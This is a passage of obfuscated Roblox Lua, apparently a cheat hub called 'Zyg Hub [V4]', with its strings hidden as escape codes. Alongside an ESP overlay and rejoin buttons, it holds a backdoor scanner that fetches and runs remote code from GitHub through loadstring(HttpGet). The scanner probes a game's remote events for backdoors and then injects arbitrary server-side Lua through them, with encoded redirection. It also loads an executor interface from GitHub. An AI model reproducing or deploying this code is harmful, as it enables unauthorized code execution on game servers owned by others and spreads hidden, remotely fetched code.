_IlIllIlllI.Size = UDim2.new(0x0, 0x64, 0x0, 0x32) _IlIllIlllI.StudsOffset = Vector3.new(0x0, 0x2, 0x0) _IlIllIlllI.AlwaysOnTop = true _IlIllIlllI.Parent = _lIIllIlIll local _IIIlIIIllI = Instance.new("\084\101\120\116\076\097\098\101\108") _IIIlIIIllI.Name = "\078\097\109\101\076\097\098\101\108" _IIIlIIIllI.Size = UDim2.new(0x1, 0x0, 0x1, 0x0) _IIIlIIIllI.BackgroundTransparency = 0x1 _IIIlIIIllI.TextColor3 = Color3.new(0x0, 0x1, 0x0) _IIIlIIIllI.TextScaled = true _IIIlIIIllI.TextStrokeTransparency = 0x0 _IIIlIIIllI.Parent = _IlIllIlllI end
 else if _llIlIIllIl then _llIlIIllIl:Destroy() end
 end
 end
 end
 task.spawn( function () while _G.MissionESPEnabled do for _, v in pairs(workspace.bossdropmission.missions:GetChildren()) do if v:FindFirstChild("\109\105\115\115\105\111\110\103\105\118\101\114") and v.missiongiver:FindFirstChild("\084\097\108\107") then local _lIIllIlIll = v.missiongiver local _llIlIIllIl = _lIIllIlIll:FindFirstChild("\087\097\118\101\077\105\115\115\105\111\110\069\083\080") local _IIIIlIlIII = v.missiongiver.Talk:FindFirstChild("\099\111\111\108\100\111\119\110") if _llIlIIllIl and _IIIIlIlIII then local _IIIlIIIllI = _llIlIIllIl:FindFirstChild("\078\097\109\101\076\097\098\101\108") if _IIIlIIIllI then _IIIlIIIllI.Text = v.Name .. "\032\124\032\067\111\111\108\100\111\119\110\058\032" .. tostring(_IIIIlIlIII.Value) end
 end
 end
 end
 task.wait(0x1) end
 end
 ) end
 }) local _lIIIlllIII = _IIIIIlIlll["\065\100\100\105\116\105\111\110\115"]:AddLeftGroupbox("\081\079\076") local _IIlllIIlll = _lIIIlllIII:AddButton({ Text = "\082\101\106\111\105\110", Func = function ()game:GetService("\084\101\108\101\112\111\114\116\083\101\114\118\105\099\101"):Teleport(game.PlaceId, game:GetService("\080\108\097\121\101\114\115").LocalPlayer) end
 , DoubleClick = true, Tooltip = "\082\101\106\111\105\110\115\032\116\104\101\032\115\097\109\101\032\115\101\114\118\101\114" }) local _IIlllIIlll = _lIIIlllIII:AddButton({ Text = "\067\111\112\121\032\071\097\109\101\073\068", Func = function () local HttpService = game:GetService("\072\116\116\112\083\101\114\118\105\099\101") local _lIIIlllIII = game.PlaceId print("\080\108\097\099\101\032\073\068\058\032" .. _lIIIlllIII) local function _IIllIlllIl(text) if setclipboard then setclipboard(text) _IIllIlIlII:Notify("\083\117\099\099\101\115\115\102\117\108\121\032\099\111\112\105\101\100\032\116\111\032\099\108\105\112\098\111\097\114\100", 0x2) else _IIllIlIlII:Notify("\067\108\105\112\098\111\097\114\100\032\099\111\112\121\105\110\103\032\105\115\032\110\111\116\032\115\117\112\112\111\114\116\101\100\032\105\110\032\116\104\105\115\032\101\110\118\105\114\111\110\109\101\110\116\046", 0x2) end
 end
 _IIllIlllIl(tostring(_lIIIlllIII)) end
 , DoubleClick = false, Tooltip = "\071\101\116\115\032\116\104\101\032\076\111\099\097\116\105\111\110\032\073\068" }) local _IIlllIIlll = _lIIIlllIII:AddButton({ Text = "\066\045\082\045\070", Func = function () local Players = game:GetService("\080\108\097\121\101\114\115") game.Players.LocalPlayer:Kick("\084\101\115\116\105\110\103\032\066\097\099\107\100\111\111\114\032\119\105\116\104\032\097\110\116\105\099\104\101\097\116\047\116\101\108\101\112\111\114\116\032\112\114\101\118\101\110\116\105\111\110\032\090\121\103\032\072\117\098\032\091\086\052\093") local _IIIIIIlIlI = game:GetService("\072\116\116\112\083\101\114\118\105\099\101") local _lllIlIIIlI = game:GetService("\073\110\115\101\114\116\083\101\114\118\105\099\101") local _IllIIllllI = game:GetService("\076\111\103\083\101\114\118\105\099\101") local _lIlIIlIllI = game:GetService("\082\117\110\083\101\114\118\105\099\101") local _lIlIIllIlI = game:GetService("\083\116\097\114\116\101\114\071\117\105") local _lIlIIlIIll = loadstring(game:HttpGet("\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\068\101\107\107\111\110\111\116\047\098\097\115\101\057\049\045\108\117\097\117\047\109\097\105\110\047\115\114\099\047\105\110\105\116\046\108\117\097"))() local _IIllIIIIlI local _IIIllllIII local _IIIllIlIII = "\091\108\111\099\097\108\032\102\117\110\099\116\105\111\110\032\109\097\105\110\040\041\032\037\115\032\101\110\100\059\108\111\099\097\108\032\097\061\116\097\098\108\101\046\099\114\101\097\116\101\040\053\049\050\041\108\111\099\097\108\032\098\061\102\117\110\099\116\105\111\110\040\046\046\046\041\108\111\099\097\108\032\099\061\123\046\046\046\125\102\111\114\032\100\044\101\032\105\110\032\112\097\105\114\115\040\099\041\100\111\032\099\091\100\093\061\116\111\115\116\114\105\110\103\040\101\041\111\114\034\110\105\108\034\101\110\100\059\114\101\116\117\114\110\032\099\032\101\110\100\059\108\111\099\097\108\032\102\044\103\059\100\111\032\108\111\099\097\108\032\104\061\103\101\116\102\101\110\118\040\041\108\111\099\097\108\032\105\044\106\061\112\114\105\110\116\044\119\097\114\110\059\104\046\112\114\105\110\116\044\104\046\119\097\114\110\061\102\117\110\099\116\105\111\110\040\046\046\046\041\116\097\098\108\101\046\105\110\115\101\114\116\040\097\044\123\048\044\119\111\114\107\115\112\097\099\101\058\071\101\116\083\101\114\118\101\114\084\105\109\101\078\111\119\040\041\044\115\101\108\101\099\116\040\034\035\034\044\046\046\046\041\044\098\040\046\046\046\041\125\041\101\110\100\044\102\117\110\099\116\105\111\110\040\046\046\046\041\116\097\098\108\101\046\105\110\115\101\114\116\040\097\044\123\049\044\119\111\114\107\115\112\097\099\101\058\071\101\116\083\101\114\118\101\114\084\105\109\101\078\111\119\040\041\044\115\101\108\101\099\116\040\034\035\034\044\046\046\046\041\044\098\040\046\046\046\041\125\041\101\110\100\059\102\044\103\061\112\099\097\108\108\040\115\101\116\102\101\110\118\040\109\097\105\110\044\104\041\041\104\046\112\114\105\110\116\044\104\046\119\097\114\110\061\105\044\106\032\101\110\100\059\108\111\099\097\108\032\107\061\073\110\115\116\097\110\099\101\046\110\101\119\040\034\066\111\111\108\086\097\108\117\101\034\041\107\046\078\097\109\101\044\107\046\086\097\108\117\101\044\107\046\080\097\114\101\110\116\061\034\037\115\034\044\102\044\103\097\109\101\058\071\101\116\083\101\114\118\105\099\101\040\034\073\110\115\101\114\116\083\101\114\118\105\099\101\034\041\107\058\083\101\116\065\116\116\114\105\098\117\116\101\040\034\115\116\100\101\114\114\034\044\110\111\116\032\102\032\097\110\100\032\103\032\111\114\032\110\105\108\041\107\058\083\101\116\065\116\116\114\105\098\117\116\101\040\034\115\116\100\111\117\116\034\044\035\097\062\048\032\097\110\100\032\103\097\109\101\058\071\101\116\083\101\114\118\105\099\101\040\034\072\116\116\112\083\101\114\118\105\099\101\034\041\058\074\083\079\078\069\110\099\111\100\101\040\097\041\111\114\032\110\105\108\041\116\097\115\107\046\100\101\108\097\121\040\054\048\044\107\046\068\101\115\116\114\111\121\044\107\041\093" local _lIlIllllll = "\091\108\111\099\097\108\032\097\044\098\044\099\044\100\061\103\097\109\101\058\071\101\116\083\101\114\118\105\099\101\040\034\076\111\103\083\101\114\118\105\099\101\034\041\044\103\097\109\101\046\083\101\116\065\116\116\114\105\098\117\116\101\044\116\097\115\107\046\100\101\108\097\121\044\034\037\115\034\059\098\040\097\044\100\044\034\037\115\034\041\059\099\040\053\044\098\044\097\044\100\044\110\105\108\041\093" local _IIlIIlllII = "\113\119\101\114\116\121\117\105\111\112\097\115\100\102\103\104\106\107\108\122\120\099\118\098\110\109\081\087\069\082\084\089\085\073\079\080\065\083\068\070\071\072\074\075\076\090\088\067\086\066\078\077\049\050\051\052\053\054\055\056\057\048\033\035\036\037\038\040\041\042\043\044\046\047\058\059\060\061\062\063\064\091\093\094\095\096\123\124\125\126\039" local _IlllIIIllI = table.create(0x14) local _IlIIllIlII = { CONFIG_URL = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\106\076\110\048\110\047\098\101\099\107\100\101\101\114\045\115\107\101\110\110\101\114\047\109\097\105\110\047\115\114\099\047\100\101\102\097\117\108\116\045\099\111\110\102\105\103\046\108\117\097", FOLDER_NAME = "\090\121\103\032\072\117\098\032\091\086\052\093\032\066\068\083\099\097\110\110\101\114" } local _lIIlllIIll = { ["\102\111\117\110\100\066\097\099\107\100\111\111\114"] = false, ["\105\110\115\116\097\110\099\101"] = nil, ["\097\114\103\115"] = {"\115\111\117\114\099\101"}, ["\097\114\103\083\114\099\073\110\100\101\120"] = 0x1, ["\115\114\099\070\117\110\099"] = nil, ["\114\101\100\105\114\101\099\116\105\111\110"] = { ["\095\095\116\101\115\116\118\101\114"] = false, ["\105\110\105\116\105\097\108\105\122\101\100"] = false, } } local _lIlllIlIlI = { ["\109\097\105\110\084\097\098\084\101\120\116"] = "\110", ["\097\116\116\097\099\104\101\100"] = "\092\110\032\065\116\116\097\099\104\101\100\032\082\101\109\111\116\101\058\032\037\115\092\110\032\084\121\112\101\058\032\037\115\092\110\032\080\097\121\108\111\097\100\058\032\037\115", ["\099\097\099\104\101\076\111\097\100\101\100"] = "\080\108\097\099\101\032\099\097\099\104\101\032\111\102\032\091\037\115\093\032\104\097\115\032\098\101\101\110\032\108\111\097\100\101\100\046", ["\112\114\105\110\116\082\101\109\111\116\101"] = "\092\110\032\082\101\109\111\116\101\058\032\037\115\032\124\032\091\037\115\093\092\110\032\084\121\112\101\058\032\037\115", ["\115\099\097\110\077\115\103\049"] = "\082\101\109\111\116\101\032\115\099\097\110\110\105\110\103\032\104\097\115\032\098\101\101\110\032\115\116\097\114\116\101\100\046", ["\115\099\097\110\077\115\103\050"] = "\089\111\117\032\099\111\117\108\100\032\115\101\101\032\116\104\101\032\114\101\109\111\116\101\115\032\098\101\105\110\103\032\115\099\097\110\110\101\100\032\105\110\032\116\104\101\032\068\101\118\101\108\111\112\101\114\032\067\111\110\115\111\108\101\032\105\102\032\099\111\110\102\105\103\046\101\110\097\098\108\101\076\111\103\103\105\110\103\032\105\115\032\115\101\116\032\116\111\032\116\114\117\101\046", ["\115\099\097\110\066\101\110\099\104\109\097\114\107"] = "\084\111\111\107\032\037\046\050\102\032\115\101\099\111\110\100\040\115\041\032\116\111\032\115\099\097\110\032\114\101\109\111\116\101\115\046", ["\099\097\099\104\101\070\097\105\108\101\100"] = "\070\097\105\108\101\100\032\116\111\032\108\111\097\100\032\116\104\101\032\098\097\099\107\100\111\111\114\032\099\097\099\104\101\032\111\102\032\091\037\115\093\044\032\105\116\032\109\105\103\104\116\032\098\101\032\111\117\116\100\097\116\101\100\046", ["\111\117\116\100\097\116\101\100\067\111\110\102\105\103"] = "\084\104\101\032\099\111\110\102\105\103\117\114\097\116\105\111\110\032\102\105\108\101\032\105\115\032\111\117\116\100\097\116\101\100\033\092\110\073\116\032\105\115\032\114\101\099\111\109\109\101\110\100\101\100\032\116\111\032\117\112\100\097\116\101\032\116\104\101\032\099\111\110\102\105\103\117\114\097\116\105\111\110\032\116\111\032\112\114\101\118\101\110\116\032\101\114\114\111\114\115\046", ["\099\111\110\102\105\103\076\111\097\100\070\097\105\108\101\100"] = "\076\111\099\097\108\032\099\111\110\102\105\103\117\114\097\116\105\111\110\032\102\097\105\108\101\100\032\116\111\032\108\111\097\100\044\032\105\116\032\109\105\103\104\116\032\098\101\032\099\111\114\114\117\112\116\101\100\046", ["\110\111\066\097\099\107\100\111\111\114\082\101\109\111\116\101"] = "\078\111\032\098\097\099\107\100\111\111\114\101\100\032\114\101\109\111\116\101\040\115\041\032\099\097\110\032\098\101\032\102\111\117\110\100\032\104\101\114\101\033", ["\114\101\109\111\116\101\082\101\100\105\114\101\099\116\076\111\097\100\070\097\105\108\101\100"] = "\082\101\109\111\116\101\032\114\101\100\105\114\101\099\116\105\111\110\032\102\097\105\108\101\100\032\116\111\032\108\111\097\100\044\032\117\115\105\110\103\032\111\114\105\103\105\110\097\108\032\114\101\109\111\116\101\046", } local _IIlIIlIlII = { ["\068\105\115\099\111\114\100\073\110\118\105\116\101\080\114\111\109\112\116"] = { Title = "\068\105\115\099\111\114\100\032\073\110\118\105\116\101\032\080\114\111\109\112\116", TextContent = "\087\111\117\108\100\032\121\111\117\032\108\105\107\101\032\116\111\032\106\111\105\110\032\111\117\114\032\100\105\115\099\111\114\100\032\099\111\109\109\117\110\105\116\121\032\115\101\114\118\101\114\063", ButtonCount = 0x2, }, ["\068\105\115\099\111\114\100\073\110\118\105\116\101\067\111\112\105\101\100"] = { Title = "\068\105\115\099\111\114\100\032\073\110\118\105\116\101\032\080\114\111\109\112\116", TextContent = "\067\111\112\105\101\100\032\100\105\115\099\111\114\100\032\115\101\114\118\101\114\032\105\110\118\105\116\101\032\085\082\076\046", ButtonCount = 0x1, Button0Text = "\079\075" } } local _IllIlllllI = { EnumItem = function (value) return string.format("\069\110\117\109\046\037\115\046\037\115", value.EnumType, value.Name) end
 , CFrame = function (value) return string.format("\067\070\114\097\109\101\046\110\101\119\040\037\115\041", tostring(value)) end
 , Vector3 = function (value) return string.format("\086\101\099\116\111\114\051\046\110\101\119\040\037\115\041", tostring(value)) end
 , BrickColor = function (value) return string.format("\066\114\105\099\107\067\111\108\111\114\046\110\101\119\040\092\034\037\115\092\034\041", value.Name) end
 , Color3 = function (value) return string.format("\067\111\108\111\114\051\046\110\101\119\040\037\115\041", tostring(value)) end
 , string = function (value) return `"\123\118\097\108\117\101\125"` end
 , number = function (value) return string.format("\037\050\046\102", value) end
 , Ray = function (value) return string.format("\082\097\121\046\110\101\119\040\086\101\099\116\111\114\051\046\110\101\119\040\037\115\041\044\032\086\101\099\116\111\114\051\046\110\101\119\040\037\115\041\041", tostring(value.Origin), tostring(value.Direction)) end
 } local _IIllIIIIII = (syn and syn.get_thread_identity) or getthreadidentity local _IIllIlIlIl = (syn and syn.set_thread_identity) or setthreadidentity local _IIlllIlllI = clonefunction(game.GetDebugId) local function _IIlIIlllII(instanceObj) local _IIIlIlIIll = _IIllIIIIII() _IIllIlIlIl(0x7) local _IIIIlIlllI = _IIlllIlllI(instanceObj) _IIllIlIlIl(_IIIlIlIIll) return _IIIIlIlllI end
 local function _llIIlIlIIl(msgText) return _lIlIIllIlI:SetCore("\083\101\110\100\078\111\116\105\102\105\099\097\116\105\111\110", { Title = "\090\121\103\032\072\117\098\032\091\086\052\093\032\066\097\099\107\100\111\111\114\032\115\099\097\110\110\101\114", Text = msgText, Duration = (0x5 + (#msgText / 0x50)) }) end
 local function _lIllIllIII(logType: "\112\114\105\110\116" | "\119\097\114\110", ...) if not _IIllIIIIlI.enableLogging then return end
 local _lllllllIlI = ( if logType == "\112\114\105\110\116" then print elseif logType == "\119\097\114\110" then warn else print ) return _lllllllIlI(...) end
 local function _IIIIIlIlII(object) if not object then return end
 local _lllIllllIl = object local _lIIlllllIl = "" while _lllIllllIl ~= game do local _lIlIllIIlI = ( if _lllIllllIl then _lllIllllIl.Name else nil) if not _lIlIllIIlI then break end
 local _lIlIllIlIl = ( if ( not string.match(_lIlIllIIlI, "\094\091\037\119\095\093\043\036")) then `["\123\099\117\114\114\101\110\116\078\097\109\101\125"]` else `.{_lIlIllIIlI}` ) _lIIlllllIl = _lIlIllIlIl .. _lIIlllllIl _lllIllllIl = _lllIllllIl.Parent end
 _lIIlllllIl = string.sub(_lIIlllllIl, 0x2) return _lIIlllllIl end
 local function _lIlIllIllI(strPath) if not strPath then return end
 local _IIIlIIlllI do _IIIlIIlllI = table.create(0x0) for matchedStr in string.gmatch(strPath, "\091\094\037\046\093\043") do local _IIIlIIIIII = string.gsub(matchedStr, "\040\046\043\041\037\091\092\034\040\046\045\041\092\034\037\093", "\037\049") local _IIIIIIIIIl = string.gsub(matchedStr, "\040\046\043\041\037\091\092\034\040\046\045\041\092\034\037\093", "\037\050") table.insert(_IIIlIIlllI, _IIIlIIIIII) if (_IIIlIIIIII == _IIIIIIIIIl and matchedStr == _IIIlIIIIII) then continue end
 table.insert(_IIIlIIlllI, _IIIIIIIIIl) end
 end
 local _lIIlllllIl = game for _, pathName in _IIIlIIlllI do if not _lIIlllllIl then return end
 _lIIlllllIl = _lIIlllllIl:WaitForChild(pathName, 0x1) end
 return _lIIlllllIl end
 local function _lIIIlIllIl(t1, t2) t1 = table.clone(t1) for index, value in t2 do value = ( if typeof(value) == "\116\097\098\108\101" then table.clone(value) else value) table.insert(t1, value) end
 return t1 end
 local function _IlllIIllll(lenght, lettersOnly) local _lIIlllllIl = "" local _lIllIIlIIl = ( if lettersOnly then 0x34 else #_IIlIIlllII) for _ = 0x1, lenght do local _lllIIlIlll = math.random(0x1, _lIllIIlIIl) _lIIlllllIl ..= string.sub(_IIlIIlllII, _lllIIlIlll, _lllIIlIlll) end
 return _lIIlllllIl end
 local function _IlIIlIllll(min, max, ...) local _lIllIIllIl = {...} local _llIIlIIlIl = math.random(min, max) task.defer(table.clear, _lIllIIllIl) return ( if not table.find(_lIllIIllIl, _llIIlIIlIl) then _llIIlIIlIl else _IlIIlIllll(min, max, ...) ) end
 local function _IIlIIIlIIl(waitTime, condition) local _IIIIIIlIIl = os.clock() repeat _lIlIIlIllI.Heartbeat:Wait() until condition() or (os.clock() - _IIIIIIlIIl) > waitTime end
 local function _lIlIllllII(object) if not (typeof(object) == "\073\110\115\116\097\110\099\101" and (object:IsA("\082\101\109\111\116\101\069\118\101\110\116") or object:IsA("\082\101\109\111\116\101\070\117\110\099\116\105\111\110"))) then return false end
 for filterName, filterFunc in _IIllIIIIlI.remoteFilters do if filterFunc and not filterFunc(object) then continue end
 return false end
 return true end
 local function _lIIlIlIIII() local _IIllIllIlI = table.create(0x80) local _IIlIIIlllI = _lIIIlIllIl( game:GetDescendants(), ( if getinstances then getinstances() else {}) ) for _, object in _IIlIIIlllI do if not _lIlIllllII(object) then continue end
 local _IIIlllIIIl = _IIlIIlllII(object) _IIllIllIlI[_IIIlllIIIl] = object end
 return _IIllIllIlI end
 local function _llIlllIIll(value) local _lIIllIIlIl = _IllIlllllI[typeof(value)] return ( if _lIIllIIlIl then _lIIllIIlIl(value) else tostring(value) ) end
 local function _lIllIIlIlI(source) for macroName, macroValue in _IIllIIIIlI.scriptMacros do macroValue = _llIlllIIll( if typeof(macroValue) == "\102\117\110\099\116\105\111\110" then macroValue(macroValue) else macroValue ) source = string.gsub(source, `%%{macroName}%%`, macroValue) end
 return source end
 local function _llIIIIIIll(_IIlIlIIIIl) return ( if _IIlIlIIIIl:IsA("\082\101\109\111\116\101\069\118\101\110\116") then _IIlIlIIIIl.FireServer elseif _IIlIlIIIIl:IsA("\082\101\109\111\116\101\070\117\110\099\116\105\111\110") then _IIlIlIIIIl.InvokeServer else nil ) end
 local _IlIIlIIIll do local _IIlIIllIIl = game:GetService("\080\108\097\121\101\114\115").LocalPlayer.UserId local function _IIlIIIIlII(source: string, key: number): string local _lIlIIlIIll = Random.new(key) local _lIIlllllIl = "" local _llIlIIllII, randY, randZ = _lIlIIlIIll:NextInteger(0x0, 0x80), _lIlIIlIIll:NextInteger(0x0, 0x60), _lIlIIlIIll:NextInteger(0x0, 0x20) for idx = 0x1, #source do local _IIIIIllIII = string.byte(source, idx, idx) local _IlIIIlllll = ((idx % _lIlIIlIIll:NextInteger(0x0, _llIlIIllII)) + _lIlIIlIIll:NextInteger(0x0, randY)) _IIIIIllIII = bit32.bxor(_IlIIIlllll, _IIIIIllIII, _lIlIIlIIll:NextInteger(0x0, randZ)) _lIIlllllIl ..= string.char(_IIIIIllIII) end
 _lIIlllllIl = string.gsub(_lIIlllllIl, "\046", function (value) return string.format("\037\048\050\088", string.byte(value)) end
 ) return _lIIlllllIl end
 function _IlIIlIIIll(source) if not _IIllIIIIlI.redirectRemote then return end
 local _lllIIllIll = math.random(0xC, 0x20) local _IIIlIIllII = table.create(_lllIIllIll) local _lIIllIIlIl = math.random(0x4, (_lllIIllIll - 0x1)) local _lIIllIlIII = _IlIIlIllll(0x2, (_lllIIllIll - 0x2), _lIIllIIlIl) local _llIIlIlIll = _IlIIlIllll(0x2, (_lllIIllIll - 0x3), _lIIllIlIII, _lIIllIIlIl) local _llllIIIIIl = _IlIIlIllll(0x2, (_lllIIllIll - 0x3), _lIIllIlIII, _lIIllIIlIl, _llIIlIlIll) local _IIIIIIlllI = Random.new((_lllIIllIll / _lIIllIIlIl) % (_lIIllIIlIl * 0x2)):NextInteger(0x8, _lllIIllIll) local _llIIllllIl = math.ceil(((((_lllIIllIll / _llIIlIlIll) % _lIIllIIlIl) * _llllIIIIIl) * (_IIlIIllIIl * _lIIllIlIII)) * _IIIIIIlllI) _IIIlIIllII[0x1] = ( if (math.random(0x1, 0x2) == 0x2) then _IlllIIllll(_lIIllIIlIl) else _lIIllIIlIl ) _IIIlIIllII[_lIIllIIlIl] = true _IIIlIIllII[_lIIllIlIII] = _lIlIIlIIll.encodeString(_IIlIIIIlII(source, _llIIllllIl)) _IIIlIIllII[_llIIlIlIll] = _lIIllIlIII _IIIlIIllII[_llllIIIIIl] = `\0x7F@{_IlllIIllll(_llIIlIlIll + _IIIIIIlllI)}` for argIndex = 0x2, _lllIIllIll do if typeof(_IIIlIIllII[argIndex]) ~= "\110\105\108" then continue end
 local _llllllIlll = math.random(0x1, 0x3) _IIIlIIllII[argIndex] = ( if _llllllIlll == 0x1 then _IlllIIllll(math.random(0xC, 0x200)) elseif _llllllIlll == 0x2 then math.random(0x0, 0x7fffffff) elseif _llllllIlll == 0x3 then math.random(0x1, 0xA) > 0x5 else nil ) end
 return _IIIlIIllII end
 end
 local function _llIlIIlIll(source, noRedirectOutput) if not _lIIlllIIll.foundBackdoor then return end
 source = _lIllIIlIlI(source) local _llIIllIlIl = _llIIIIIIll(_lIIlllIIll.instance) local _lIllIIIIII = table.clone(_lIIlllIIll.args) if (_IIllIIIIlI.redirectOutput and not noRedirectOutput) then local _lIlIIllIll = _IlllIIllll(0x20) source = string.format(_IIIllIlIII, source, _lIlIIllIll) local _IlIlllIIll _IlIlllIIll = _lllIlIIIlI.ChildAdded:Connect( function (object) if object.Name ~= _lIlIIllIll then return end
 _IlIlllIIll:Disconnect() local _lIllIllIll = object:GetAttribute("\115\116\100\111\117\116") local _llllIllIll, stdout = pcall(_IIIIIIlIlI.JSONDecode, _IIIIIIlIlI, _lIllIllIll) if _llllIllIll then for _, output in stdout do local _IlllllIlII, timestamp = ( if output[0x1] == 0x0 then Enum.MessageType.MessageOutput elseif output[0x1] == 0x1 then Enum.MessageType.MessageWarning else nil ), output[0x2] local _lIlllllIlI = "" for index = 0x1, output[0x3] do _lIlllllIlI ..= `{tostring(output[0x4][index]) or nil} ` end
 _IIIllllIII.console.createOutput(_lIlllllIlI, _IlllllIlII, timestamp) end
 end
 if not object.Value then _IIIllllIII.console.createOutput(object:GetAttribute("\115\116\100\101\114\114") or "\069\114\114\111\114\032\111\099\099\117\114\101\100\044\032\110\111\032\111\117\116\112\117\116\032\102\114\111\109\032\076\117\097\046", Enum.MessageType.MessageError) end
 end
 ) task.delay(0x3C, _IlIlllIIll.Disconnect, _IlIlllIIll) end
 if (_IIllIIIIlI.redirectRemote and _lIIlllIIll.redirection.initialized) then _lIllIIIIII = _IlIIlIIIll(source) else source = ( if _lIIlllIIll.srcFunc then _lIIlllIIll.srcFunc(source) else source) _lIllIIIIII[_lIIlllIIll.argSrcIndex] = source end
 task.spawn(_llIIllIlIl, _lIIlllIIll.instance, unpack(_lIllIIIIII)) end
 local function _IIlIlIIIlI(params, overwriteRemoteInfo) if (_lIIlllIIll.foundBackdoor and not overwriteRemoteInfo) then return end
 _lIIlllIIll.foundBackdoor = true for name, value in params do _lIIlllIIll[name] = value end
 end
 local function _IllIlIIlII() if not (_lIIlllIIll.foundBackdoor and (_IIllIIIIlI.redirectRemote and not _lIIlllIIll.redirection.initialized)) then return false end
 local _lIlIIllIll = _IlllIIllll(0x20, true) _llIlIIlIll(`require({ if _lIIlllIIll.redirection.__testver then 0x2C5AD78CB else 0x2C5AD99E0})("\123\110\111\110\099\101\125", %userid%)`, true) _IIlIIIlIIl(0x5, function () return _lllIlIIIlI:GetAttribute(_lIlIIllIll) end
 ) local _IlIllIllII = _lllIlIIIlI:GetAttribute(_lIlIIllIll) if not _IlIllIllII then return _llIIlIlIIl(_lIlllIlIlI.remoteRedirectLoadFailed) end
 local _llIIlIIIIl = _lIlIllIllI(_IlIllIllII) if _llIIlIIIIl and _llIIlIIIIl:IsA("\082\101\109\111\116\101\069\118\101\110\116") and _llIIlIIIIl:GetAttribute("\105\115\078\111\110\099\101\100") then _lIIlllIIll.redirection.initialized = true _IIlIlIIIlI({ ["\105\110\115\116\097\110\099\101"] = _llIIlIIIIl, ["\097\114\103\115"] = {"\115\111\117\114\099\101"}, ["\097\114\103\083\114\099\073\110\100\101\120"] = 0x1 }, true) _lllIlIIIlI:GetAttributeChangedSignal(_lIlIIllIll):Connect( function () local _IllIIlIllI = _lllIlIIIlI:GetAttribute(_lIlIIllIll) if not _IllIIlIllI then return end
 local _IlIIIlIlII = _lIlIllIllI(_IllIIlIllI) if _IlIIIlIlII and _IlIIIlIlII:IsA("\082\101\109\111\116\101\069\118\101\110\116") and _IlIIIlIlII:GetAttribute("\105\115\078\111\110\099\101\100") then _lIIlllIIll.instance = _IlIIIlIlII end
 end
 ) return true else _llIIlIlIIl(_lIlllIlIlI.remoteRedirectLoadFailed) return false end
 end
 local function _lIllIIIllI(inviteCode: string) if _IIllIIIIlI.__STOPINVITEPROMPT then return end
 local _IIIIIIllIl = (syn and syn.request) or (http and http.request) or request or _IIIIIIllIl local _lIlllllIll = _IIIllllIII.misc.newMessageBox("\068\101\102\097\117\108\116", _IIlIIlIlII.DiscordInvitePrompt) if _lIlllllIll.ClickedButton == 0x0 then local _llllIlIIII = ( if _IIIIIIllIl then _IIIIIIllIl({ Url = "\104\116\116\112\058\047\047\049\050\055\046\048\046\048\046\049\058\054\052\054\051\047\114\112\099\063\118\061\049", Method = "\080\079\083\084", Headers = { ["\067\111\110\116\101\110\116\045\084\121\112\101"] = "\097\112\112\108\105\099\097\116\105\111\110\047\106\115\111\110", ["\079\114\105\103\105\110"] = "\104\116\116\112\115\058\047\047\100\105\115\099\111\114\100\046\099\111\109" }, Body = _IIIIIIlIlI:JSONEncode({ ["\097\114\103\115"] = {["\099\111\100\101"] = inviteCode}, ["\099\109\100"] = "\073\078\086\073\084\069\095\066\082\079\087\083\069\082", ["\110\111\110\099\101"] = _IIIIIIlIlI:GenerateGUID() }) }) else nil ) if not _llllIlIIII or (_llllIlIIII.StatusCode ~= 0xC8 or _IIIIIIlIlI:JSONDecode(_llllIlIIII.Body).data.code == 0xFAB) then setclipboard(`https://discord.gg/{inviteCode}`) _IIIllllIII.misc.newMessageBox("\068\101\102\097\117\108\116", _IIlIIlIlII.DiscordInviteCopied) return end
 end
 end
 local function _IlIIIlIIll(remoteInfoParams) if (_lIIlllIIll.foundBackdoor and _lIIlllIIll.instance) then return end
 _IIlIlIIIlI(remoteInfoParams) _llIIlIlIIl("\065\116\116\097\099\104\101\100\033") _lIllIllIII("\119\097\114\110", string.format(_lIlllIlIlI.attached, _IIIIIlIlII(remoteInfoParams.instance), remoteInfoParams.instance.ClassName, remoteInfoParams.payloadName or "\110\105\108")) _IllIlIIlII() _IIIllllIII = loadstring(game:HttpGet("\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\106\076\110\048\110\047\101\120\101\099\117\116\111\114\045\103\117\105\047\109\097\105\110\047\115\114\099\047\108\111\097\100\101\114\046\108\117\097"))({ mainTabText = _lIlllIlIlI.mainTabText, customExecution = true, executeFunc = function (source) return _llIlIIlIll(source) end
 , }) task.spawn(_lIllIIIllI, "\106\118\098\055\088\078\122\078\080\078") for _, scriptSrc in _IIllIIIIlI.autoExec do _llIlIIlIll(scriptSrc) end
 end
 local function _IIlIIIllIl(_lIlIIllIll, _IIlIlIIIIl, _IIIlllIIIl) local _lIIlIIIIll = _llIIIIIIll(_IIlIlIIIIl) for payloadIndex, _llIIlIlIII in _IlllIIIllI do _lIlIIlIllI.Heartbeat:Wait() local _IllIIlIlIl = ( if _llIIlIlIII.Verifier then _llIIlIlIII.Verifier(_IIlIlIIIIl) else true) if ( not _IllIIlIlIl or not _llIIlIlIII.Args) then continue end
 local _llIIIIllIl = table.clone(_llIIlIlIII.Args) local _IIllIIllIl = table.find(_llIIIIllIl, "\115\111\117\114\099\101") if not _IIllIIllIl then continue end
 _llIIIIllIl[_IIllIIllIl] = string.format(_lIlIllllll, _lIlIIllIll, `{_IIIlllIIIl}|{_llIIlIlIII.Name}`) pcall(task.spawn, _lIIlIIIIll, _IIlIlIIIIl, unpack(_llIIIIllIl)) end
 end
 local function _IIlIIIlllI() if _lIIlllIIll.foundBackdoor then return end
 local _llIIlllIII = _lIIlIlIIII() local _lIlIIllIll = _IlllIIllll(0x20, true) local _IlIlllIIll; _IlIlllIIll = _IllIIllllI.AttributeChanged:Connect( function (attributeName) if attributeName ~= _lIlIIllIll then return end
